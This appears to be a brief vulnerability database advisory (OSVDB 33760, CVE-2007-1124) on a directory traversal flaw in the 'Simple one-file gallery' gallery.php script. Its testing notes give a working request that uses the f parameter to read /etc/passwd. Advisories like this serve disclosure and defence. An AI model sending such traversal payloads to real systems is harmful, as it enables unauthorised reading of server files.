Simple one-file gallery gallery.php f Variable Traversal Arbitrary File Access

2007-02-23T06:18:52
ID OSVDB:33760
Type osvdb
Reporter OSVDB
Modified 2007-02-23T06:18:52

Description

Manual Testing Notes

/gallery.php?f=../../../../../../../../../../../../etc/passwd

References:

Related OSVDB ID: 33759 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-02/0462.html ISS X-Force ID: 32654 CVE-2007-1124 Bugtraq ID: 22700